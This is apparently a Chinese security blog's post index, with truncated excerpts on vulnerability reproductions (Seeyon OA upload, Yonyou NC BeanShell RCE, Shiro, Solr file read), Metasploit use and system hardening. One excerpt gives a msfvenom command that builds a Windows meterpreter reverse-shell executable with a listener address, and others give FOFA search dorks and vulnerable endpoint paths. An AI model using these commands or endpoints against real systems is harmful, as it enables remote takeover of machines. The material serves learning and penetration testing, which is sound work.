- 博客(13)
- 收藏
- 关注
RSS订阅原创 解决虚拟机VMware运行Ubuntu时无法和主机之间复制粘贴的问题
sudo apt-get autoremove open-vm-toolssudo apt-get install open-vm-toolssudo apt-get install open-vm-tools-desktop
2021-11-30 12:09:54
4085
原创 docker安装pocbox
PoCBox - 漏洞测试验证辅助平台开发这个平台的初衷是帮助自己在漏洞挖掘测试中更加方便快捷的辅助自己进行漏洞验证。一开始的想法是框架化、模块化,但是开发着开发着就发现有点累,于是采用了原始的方法去开发:原生JavaScript+PHP。PoCBox功能: 生成漏洞验证代码(便于撰写报告)、在线测试(便于快速手工测试)下面说一下怎么在docker下安装pocboxDocker拉镜像docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/poc
2021-09-24 11:22:25
276
原创 致远OA任意文件上传
致远OA任意文件上传漏洞简介 致远OA是一套办公协同管理软件。由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。影响范围致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6.0、V6.1SP1、V6.1SP2致远OA V5.x致远OA G6复现过程1.判断是否存在漏洞http://xxx.xxx.xxx.x
2021-07-29 10:56:12
4729
原创 shiro反序列化
shiro反序列化首先呢,我们要了解shiro反序列化是什么。Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞。漏洞原理Apache Shiro框架提供了一个记住我的功能,这个功能在用户登录成功之后,会生成一个加密后的cookie。其中记住我的RememberMe就是cookie中的key。cookie的值是对相关信息进过序列化,再进行aes加密,再使用base64编码之后形成的。服务端接收cookie值
2021-07-20 09:46:07
7568
8
原创 用友NC BeanShell远程代码执行漏洞复现
用友NC远程代码执行漏洞复现漏洞介绍用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。影响范围NC 6.5版本复现流程打开FAFO,输入语言:title==“YONYOU NC”。大概就是这个样子的。接下来访问网址。然后更改url为:ip/servlet/~ic/bsh.servlet.BshServlet就是这
2021-06-07 15:18:52
4263
3
原创 Apache Solr 任意文件读取漏洞复现
Apache Solr 任意文件读取漏洞复现前段时间hvv的时候,发现的oday漏洞,本着学习的精神,于是我想复现了一波。Apache Solr 存在的这个任意文件读取的漏洞,攻击者可以在未授权的情况下获取到目标系统的敏感文件。漏洞复现开始首先我们用fofa搜索app="APACHE-Solr"然后打开首页:再然后需要获取到cores的配置信息,怎么获取呢?http://xxx/solr/admin/cores?indexInfo=false&wt=json这里的name就
2021-05-06 18:00:47
337
1
原创 关于burpsuite在intruder返回包中,对内容进行匹配
关于burpsuite在intruder返回包中,对内容进行匹配在渗透测试中,有些时候,爆破返回的数据包,长度一致,我们就无法对爆破结果进行筛选判断。但是返回包中的数据如果不同,那么一样可以进行筛选。那么怎么做呢。接下来开始演示流程。演示环境返回包的长度一致,但是一个是返回”原密码错误“,一个返回的是”用户不存在“。所以我们就争对这个做筛选。可以看到,返回的包,长度一致,但是数据不同,那么我们就可以利用这个不同,去筛选不同的返回包。有些同学会问,那直接输入汉字可以吗?答案是不可以的,那么我
2021-03-03 15:08:59
4003
1
原创 msf反弹shell
1. 首先打开msf的payload模块。找到windows/x64/meterpreter_reverse_tcp,然后使用该payload。再在新的终端使用下面的命令。msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -o abc.exe2. 打开监测模块。msf6 exploit(multi/handler) > set LHOST 192.168.1.5ms
2020-12-09 12:06:13
1589
原创 msf对主机的渗透
msf对主机的渗透1.开始启动msf。root@zs:~# msfconsole 2.查看主机是否存在漏洞。msf6 > search ms17msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.14RHOSTS => 192.168.1.14msf6 auxiliary(scanner/
2020-12-03 17:42:14
615
原创 windows服务器系统加固
windows基本安全加固方案一、禁用Guest账户和无关账户Guest账户为黑客入侵打开了方便之门,黑客使用Guest账户可以进行提权。禁用Guest账户是最好的选择。操作流程:进入“控制面板->管理工具->计算机管理->本地用户和组->用户->Guest”“账户已禁用”打勾启用加固后:二、密码策略加强操作系统、用户身份鉴别信息应具有不易被冒用的特点,口令应复杂度要求并定期更换。操作流程:进入“控制面板->管理工具->本地安全策略”,在“帐户策略-
2020-09-05 11:26:50
603
原创 Linux系统安全加固
Linux系统安全加固1.身份鉴别1.1 密码安全策略1)查看空密码帐号2) 修改vim /etc/login.defs 配置密码周期策略3) vim /etc/pam.d/system-auth配置密码复杂度1.2 登录失败策略1.3 安全的远程管理方式1.身份鉴别1.1 密码安全策略操作系统管理用户的密码应该具有相应的复杂度。所以设置有效胡密码策略,可以防止攻击者破解密码。1)查看空密码帐号awk -F: '($2 == ""){print $1}' /etc/shadow2) 修
2020-08-29 17:19:27
413
原创 LAMP平台搭建
一、什么是LAMP?L:linux操作系统;A:apache网站服务;M:mysql数据库(7以上系统叫做Maraidb);P:PHP、Perl、Python二、什么是apahe?网站服务,不配合数据库时,只能用于静态网站搭建,通过HTTP或者HTTPS协议进行数据通信;http:默认监听TCP的80号端口;https:默认监听TCP的443号端口;工作在应用层三、什么是数据库?1. 什么是数据?由数字、字符构成2. 数据库的类型?1 、关系型数据库:以结构化得方式进行存储数据;mysql
2020-08-19 11:28:41
127
原创 关于在Centos中mysql中文乱码问题的解决方法
1. 查看mysql编码格式使用命令:show variables like'character_set_%';show variables like'collation_%';从上面的结果看到:character_set_database | latin1collation_database | latin1_swedish_ci发现编码不一致。2. 解决办法断开数据库链接;关闭数据库服务在/etc/my.cfg配置文件中的[mysqld]字段中添加下列两行cha
2020-08-19 10:35:55
223
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人